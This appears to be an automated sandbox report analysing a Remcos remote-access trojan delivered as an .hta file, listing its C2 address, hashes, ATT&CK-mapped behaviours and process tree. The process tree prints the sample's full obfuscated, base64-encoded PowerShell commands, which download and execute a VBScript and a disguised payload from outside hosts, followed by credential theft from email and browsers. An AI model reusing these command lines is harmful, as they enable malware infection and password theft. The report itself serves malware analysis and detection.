remcos | a46ea1e4766c89b34c82354c215e4a27c11cb53886ace74f78af8655dfa09fab

Analysis

max time kernel
147s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
01-02-2025 03:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a46ea1e4766c89b34c82354c215e4a27c11cb53886ace74f78af8655dfa09fab.hta
Size

15KB
MD5

b6bca63d34e72f931db79e9b7af61d21
SHA1

b9bb3c1c502d31bd3fdb1841d312c2fa5bab4caf
SHA256

a46ea1e4766c89b34c82354c215e4a27c11cb53886ace74f78af8655dfa09fab
SHA512

acce0debf2b8dfa9bc06c1c317cc3491d61c7ca48607c614a95674454bc3a5fb8a1f8d898bb40d517272643af63aae3e06cedd76432cf2c8da6ab905c0c0d6ea
SSDEEP

48:3hMuVfhMLVfu4TArxprC+cAZSnRyxm6SMkMMf2M2VfmMTG:heFTArxVncWSWSjAo

Score

10^/10

remcos remotehost collection defense_evasion discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

216.9.226.100:3898

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
true
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
mic
mouse_option
false
mutex
Rmc-Q9T2QD
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/4124-108-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/2532-106-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/1040-105-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/1040-105-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/2532-106-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 3 IoCs

flow	pid	Process
17	216	powershell.exe
20	1836	powershell.exe
21	1836	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
216	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4003209913-3868522715-854928974-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4003209913-3868522715-854928974-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4003209913-3868522715-854928974-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	CasPol.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1836	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 1836 set thread context of 1268	1836	powershell.exe	94
PID 1268 set thread context of 2532	1268	CasPol.exe	95
PID 1268 set thread context of 1040	1268	CasPol.exe	97
PID 1268 set thread context of 4124	1268	CasPol.exe	98

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
216	powershell.exe
216	powershell.exe
1836	powershell.exe
1836	powershell.exe
2532	CasPol.exe
2532	CasPol.exe
4124	CasPol.exe
4124	CasPol.exe
2532	CasPol.exe
2532	CasPol.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
1268	CasPol.exe
1268	CasPol.exe
1268	CasPol.exe
1268	CasPol.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	216	powershell.exe
Token: SeDebugPrivilege	1836	powershell.exe
Token: SeDebugPrivilege	4124	CasPol.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1268	CasPol.exe

Suspicious use of WriteProcessMemory 43 IoCs

description	pid	Process	procid_target
PID 2816 wrote to memory of 4372	2816	mshta.exe	86
PID 2816 wrote to memory of 4372	2816	mshta.exe	86
PID 2816 wrote to memory of 4372	2816	mshta.exe	86
PID 4372 wrote to memory of 216	4372	cmd.exe	88
PID 4372 wrote to memory of 216	4372	cmd.exe	88
PID 4372 wrote to memory of 216	4372	cmd.exe	88
PID 216 wrote to memory of 2908	216	powershell.exe	89
PID 216 wrote to memory of 2908	216	powershell.exe	89
PID 216 wrote to memory of 2908	216	powershell.exe	89
PID 2908 wrote to memory of 4568	2908	csc.exe	90
PID 2908 wrote to memory of 4568	2908	csc.exe	90
PID 2908 wrote to memory of 4568	2908	csc.exe	90
PID 216 wrote to memory of 848	216	powershell.exe	91
PID 216 wrote to memory of 848	216	powershell.exe	91
PID 216 wrote to memory of 848	216	powershell.exe	91
PID 848 wrote to memory of 1836	848	WScript.exe	92
PID 848 wrote to memory of 1836	848	WScript.exe	92
PID 848 wrote to memory of 1836	848	WScript.exe	92
PID 1836 wrote to memory of 1268	1836	powershell.exe	94
PID 1836 wrote to memory of 1268	1836	powershell.exe	94
PID 1836 wrote to memory of 1268	1836	powershell.exe	94
PID 1836 wrote to memory of 1268	1836	powershell.exe	94
PID 1836 wrote to memory of 1268	1836	powershell.exe	94
PID 1836 wrote to memory of 1268	1836	powershell.exe	94
PID 1836 wrote to memory of 1268	1836	powershell.exe	94
PID 1836 wrote to memory of 1268	1836	powershell.exe	94
PID 1836 wrote to memory of 1268	1836	powershell.exe	94
PID 1836 wrote to memory of 1268	1836	powershell.exe	94
PID 1268 wrote to memory of 2532	1268	CasPol.exe	95
PID 1268 wrote to memory of 2532	1268	CasPol.exe	95
PID 1268 wrote to memory of 2532	1268	CasPol.exe	95
PID 1268 wrote to memory of 2532	1268	CasPol.exe	95
PID 1268 wrote to memory of 3416	1268	CasPol.exe	96
PID 1268 wrote to memory of 3416	1268	CasPol.exe	96
PID 1268 wrote to memory of 3416	1268	CasPol.exe	96
PID 1268 wrote to memory of 1040	1268	CasPol.exe	97
PID 1268 wrote to memory of 1040	1268	CasPol.exe	97
PID 1268 wrote to memory of 1040	1268	CasPol.exe	97
PID 1268 wrote to memory of 1040	1268	CasPol.exe	97
PID 1268 wrote to memory of 4124	1268	CasPol.exe	98
PID 1268 wrote to memory of 4124	1268	CasPol.exe	98
PID 1268 wrote to memory of 4124	1268	CasPol.exe	98
PID 1268 wrote to memory of 4124	1268	CasPol.exe	98

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\a46ea1e4766c89b34c82354c215e4a27c11cb53886ace74f78af8655dfa09fab.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2816
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c poWerShELl -EX BYpASS -nop -W 1 -C DEVIcecREdEntIAlDePloYment.eXE ; INVOKe-eXPRESSIoN($(INvoKe-eXpreSsION('[SYSTEM.TEXt.ENCODiNg]'+[chaR]58+[CHaR]0X3A+'UTf8.getSTRiNg([sysTEM.CONVErT]'+[CHaR]58+[CHaR]0x3a+'frOmBASE64STRING('+[CHaR]34+'JE5nZUdPdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1CZXJEZUZpTml0aU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpreUYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGU3hxSGZWLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCQVMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJRaSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT1BWICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICROZ2VHT3U6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMTcuMTYwLjE2My4xMTMvNTUwL25pY2V3b3JraW5nc2tpbGxnaXZlbWViZXN0dGhpbmdzZm9yYm9vc3RiZXN0Zm9ybWVnaXZlbmJlc3RjaGFsbC5nSUYiLCIkRW5WOkFQUERBVEFcbmljZXdvcmtpbmdza2lsbGdpdmVtZWJlc3R0aGluZ3Nmb3Jib29zdGJlc3Rmb3JtZWdpdmVuYmVzdGMudmJzIiwwLDApO1NUQVJULVNsZWVQKDMpO0lOVk9LRS1lWFByZXNzSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNld29ya2luZ3NraWxsZ2l2ZW1lYmVzdHRoaW5nc2ZvcmJvb3N0YmVzdGZvcm1lZ2l2ZW5iZXN0Yy52YnMi'+[ChAr]0X22+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4372
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    poWerShELl -EX BYpASS -nop -W 1 -C DEVIcecREdEntIAlDePloYment.eXE ; INVOKe-eXPRESSIoN($(INvoKe-eXpreSsION('[SYSTEM.TEXt.ENCODiNg]'+[chaR]58+[CHaR]0X3A+'UTf8.getSTRiNg([sysTEM.CONVErT]'+[CHaR]58+[CHaR]0x3a+'frOmBASE64STRING('+[CHaR]34+'JE5nZUdPdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1CZXJEZUZpTml0aU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpreUYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGU3hxSGZWLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCQVMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJRaSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT1BWICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICROZ2VHT3U6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMTcuMTYwLjE2My4xMTMvNTUwL25pY2V3b3JraW5nc2tpbGxnaXZlbWViZXN0dGhpbmdzZm9yYm9vc3RiZXN0Zm9ybWVnaXZlbmJlc3RjaGFsbC5nSUYiLCIkRW5WOkFQUERBVEFcbmljZXdvcmtpbmdza2lsbGdpdmVtZWJlc3R0aGluZ3Nmb3Jib29zdGJlc3Rmb3JtZWdpdmVuYmVzdGMudmJzIiwwLDApO1NUQVJULVNsZWVQKDMpO0lOVk9LRS1lWFByZXNzSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNld29ya2luZ3NraWxsZ2l2ZW1lYmVzdHRoaW5nc2ZvcmJvb3N0YmVzdGZvcm1lZ2l2ZW5iZXN0Yy52YnMi'+[ChAr]0X22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:216
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0z3fiwxq\0z3fiwxq.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2908
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAE51.tmp" "c:\Users\Admin\AppData\Local\Temp\0z3fiwxq\CSC5DF8982380004CC194EB34746155989C.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4568
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\niceworkingskillgivemebestthingsforboostbestformegivenbestc.vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:848
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AcwBnAG4AaQBoAHQAZABvAG8AZwBwAHUAdAByAGEAdABzAHcAZQBuAHIAbwBmAHMAZwBuAGkAaAB0AHQAcwBlAGIAeQBtAGUAZQBzAC8AMAA1ADUALwAzADEAMQAuADMANgAxAC4AMAA2ADEALgA3ADEAMgAvAC8AOgBwAHQAdABoACcAOwAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACAAPQAgACQAbwByAGkAZwBpAG4AYQBsAFQAZQB4AHQAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGkAbQBhAGcAZQBVAHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAcwAuAGMAbABvAHUAZABpAG4AYQByAHkALgBjAG8AbQAvAGQAYQB4AHcAdQBhADYAMwB5AC8AaQBtAGEAZwBlAC8AdQBwAGwAbwBhAGQALwB2ADEANwAzADcANgA5ADYAMQA3ADEALwBoAGUAawBlADIAcABtAHQAZQB1AHcAOABzAHEAcwBwAGwAaABrAGwALgBqAHAAZwAnADsAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAaQBtAGEAZwBlAFUAcgBsACkAOwAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABzAHQAYQByAHQARgBsAGEAZwApADsAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAKQA7ACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwAkAHQAeQBwAGUAIAA9ACAAWwBDAGwAYQBzAHMATABpAGIAcgBhAHIAeQAxAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAG0AYQBpAG4AJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIABAACgAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAsACcAZgBhAGwAcwBlACcALAAnAEMAYQBzAFAAbwBsACcALAAnAGYAYQBsAHMAZQAnACkAKQA=')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1836
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1268
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\slkaglsglmrmjptji"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2532
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\cfqkhddhzujzldpnrhyj"
        7⤵
        
        PID:3416
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\cfqkhddhzujzldpnrhyj"
        7⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:1040
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\nhvdawobucbevjdzirtcgck"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4124

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\mic\logs.dat

Filesize
102B

MD5
c01e1ac180c571da69a25385bb11a35a

SHA1
991f3a45c8dec1596f13334f4a0088b9f834ed5b

SHA256
e068ec945bab605494d41d76272e30ebac3261b7c4b53dfdad7bff0de16cdfee

SHA512
06a8f83b43c9ff020c07cae1b4ce295799e07885c21bc89c9798f991b490f3b92fe54928fedf78835054ee0dad6048948d257173bf0c29fc949aa978a60f1f91

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
d4818834b889a2ced5ffdcc89d25187c

SHA1
4b96541dd31a73e791be2a036a1f96efeb82be9e

SHA256
650e82fee180c29d9ec1ff504a2eaa6d2760d12e8cb439466642c5bee0700a4f

SHA512
ca36df82e791369abd2ba7188c857e607c85ad82c84c9d01fe47242d21eab866d09b89a584eb06e2f10faa3b6ac1acb9013f2418bfcd06f5b2df13f17fc64976

Download Submit
C:\Users\Admin\AppData\Local\Temp\0z3fiwxq\0z3fiwxq.dll

Filesize
3KB

MD5
851cad786bfb47ab75d689e88d234075

SHA1
740bda6e61e9dd14f5e475096b7109d5f0b13247

SHA256
c9d5c758a8ba632dc5ad0dabe0d154adcdf4055b4de8fd774a5d41f59262bb70

SHA512
dd70a65b4a9c06bfba9d1e24550c3f67424294f2879bf95e5b1115c1983c9a80eeeef22f9bd3bb704e68964848b0284c75bedc9348fa32a781b4a76ed5c69b8c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESAE51.tmp

Filesize
1KB

MD5
7695ae52558c6fba96608ad73f0f29cb

SHA1
c6cd27dd546bf66bda87a4cdcf251dc490477608

SHA256
94cff80c3bb395e7936bb7d2d435ffe3a5505bbbbc0a906a77427bb6756b1693

SHA512
93a574dbd04bc1c9fa0653c03baf300b6e0bfaffc857136fc6580ea907469fef96ee6dde06f327d38da5a6896217c0468d9cd7dd797890b604f624d758f4cc07

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h04r2xlo.ifq.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\slkaglsglmrmjptji

Filesize
4KB

MD5
f59f92591b8d57a95f1a5beb23a658d7

SHA1
6d26907d3d1ad1799f6bda6ba2c7db51f0e8d56d

SHA256
2a662290f17ef4bd2b908aea8ebcabeef63117955b5be1769425bdefdbad1b22

SHA512
b619288957ad69898e325207462e20cfa7bbf9b116ec5237da6fe47fef5450b1e9e040f1c60941b00bad9e9cb31f775c843f4d180f575643d6894f51548aa13b

Download Submit
C:\Users\Admin\AppData\Roaming\niceworkingskillgivemebestthingsforboostbestformegivenbestc.vbs

Filesize
223KB

MD5
0f3025d4d5a84125b6976beadc384ba6

SHA1
00f8ef347fac607094499a75102a0f330bd61ae1

SHA256
ecbd9b07289801b665dbd8822fe23248e816033fe5791f227f81b13f01645182

SHA512
3528872018fd7b511d93bfb0a82043c45b076b7bc197a1b66e42d76d775a032875640793494491f8c609aa6c0410c32f88fa0b2f339bd59ed166eed0c77cb211

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0z3fiwxq\0z3fiwxq.0.cs

Filesize
455B

MD5
d8cdd711e8e78d09c6cc1ab48e24dd50

SHA1
5cb77a53a82f93db5edd021d706f986dd504005a

SHA256
c2c29865844c4fea1dcecd5de4489dbb084ddda0720ecd40cf1bfc76f50c37f8

SHA512
66814498882b10126c2d5abdf4b223c4d37a2432b1d315dbcde5a65cb7f121f36be0a57a40467ab8b43f800f13a0dd7038002f09fa09e83183cde110296e4635

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0z3fiwxq\0z3fiwxq.cmdline

Filesize
369B

MD5
ff51f67f834de215305121c8f3ba7260

SHA1
807bea6741de1506b571d5381ebc788ad472fb9d

SHA256
9f3994d95f630134a7f85ee2518edfab0311d7f001f3f0a63d7065d5cc06900f

SHA512
16634fe4e2f82bf7512729e189a93904262b1e191023762c6e2275276d48d245a290dee8527ebdefc8b54a94aea216b4b73bb0af452e71590163c178bc4bebb4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0z3fiwxq\CSC5DF8982380004CC194EB34746155989C.TMP

Filesize
652B

MD5
667dfd96b42e5d80cca9e8c1f45cad8f

SHA1
1d6c6fe94ad81c8aabf6d7ff08bbf04224d1239f

SHA256
f9293da99367d47160785fcdcfb293c1f8dcc8453771f008492d0224223f2a98

SHA512
3d12b4413c0d0ca0720be54495326ec7e5f99e9e23812c49a343d6e73d06dddf5bf7864fff0546d576c5e157ba0c57b1e8e6c7c12c5e2c05385d9ccfb3849799

Download Submit
memory/216-38-0x0000000007980000-0x000000000799A000-memory.dmp

Filesize
104KB

Download
memory/216-33-0x0000000006C10000-0x0000000006C2E000-memory.dmp

Filesize
120KB

Download
memory/216-22-0x0000000071530000-0x0000000071CE0000-memory.dmp

Filesize
7.7MB

Download
memory/216-21-0x000000006DDF0000-0x000000006DE3C000-memory.dmp

Filesize
304KB

Download
